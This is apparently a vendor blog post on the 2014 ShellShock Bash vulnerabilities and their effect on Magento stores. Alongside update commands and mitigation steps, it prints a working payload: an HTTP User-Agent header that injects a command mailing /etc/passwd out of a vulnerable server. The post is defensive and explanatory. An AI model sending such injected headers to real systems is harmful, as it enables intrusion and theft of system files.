Meet the shellshock

DISCLAIMER
The software mentioned in the article is provided AS IS, and we do not take any responsibility for any issues or losses that can be caused by its usage.

What ShellShock is about

Some facts about the new vulnerability of the many distributions basic component were introduced last week. They are referred to the Bash command interpreter, which is undoubtedly the most popular command interpreter for the moment.

Thousands of websites suffered from various kinds of attacks, from DoS to command and control deployment attempts. This vulnerability was called ShellShock, also known as Bashdoor.

CVE-2014-6271 vulnerability was massively announced last week and rapidly fixed in all the major distributions.

On the next day a CVE-2014-7169 vulnerability was announced. It described the way to bypass the CVE-2014-6271 patch and was fixed too. Two more Bash vulnerabilities were announced on that day, they were CVE-2014-7186 and CVE-2014-7187.

You need the local user server rights to take advantage of the last two weaknesses, and therefore they are not as dangerous as the first two mentioned (CVE-2014-6271 and CVE-2014-7169).

ShellShock Checker from Amasty

We created a ShellShock Checker which allows performing an express check of possible vulnerabilities on your server.

To use the Checker you need to have the local user rights for the servers examined. We do not recommend picking the root user for the test. List your servers in the SERVERS variable in check_shellshock.sh and comment the line #4 out.

Nevertheless, regardless of the test result we strongly recommend updating Bash to the latest version available.

Instructions on updating Bash for various distributions

Debian/Ubuntu

sudo apt-get update && sudo apt-get install --only-upgrade bash

RHEL/CentOS

sudo yum update bash

ShellShock and your Magento store

We conducted a small study to find out how the ShellShock vulnerability influences Magento.
The Bash version without fixes was installed on one of our test servers with Apache and mod_cgi. Then a cron task was added to one of the Magento extensions to run this command (the code can be random, although you have to use system/exec/passthru/etc functions):

system('/bin/bash -c id');

We attacked the http://shellshock.local/cron.php with the following request:

GET /cron.php HTTP/1.1
Host: shellshock.local
User-Agent: () { :;}; /usr/sbin/mail -s cron root@shellshock.local < /etc/passwd

As a result of the test attack root@shellshock.local received an email with /etc/passwd file.

After testing various configurations, we came to the conclusion that the issue is relevant for setups where PHP works with Apache/mod_cgi and Apache/mod_cgid. Looks like Apache/mod_php and Nginx + Fast-CGI combinations are not affected (although we do not 100% guarantee that).

Steps to protect your Magento from the cron.php attack

  • Update Bash to the latest version available;
  • Make sure cron.php is available only from the list of your trusted IPs;
  • If that’s possible, replace the /bin/sh system shell, for instance, with dash.

And the main conclusion: always update your software on time! It helps to avoid many possible server issues and reduces the risk of attacks.

Got some thoughts on the ShellShock impact? Share your experience in comments.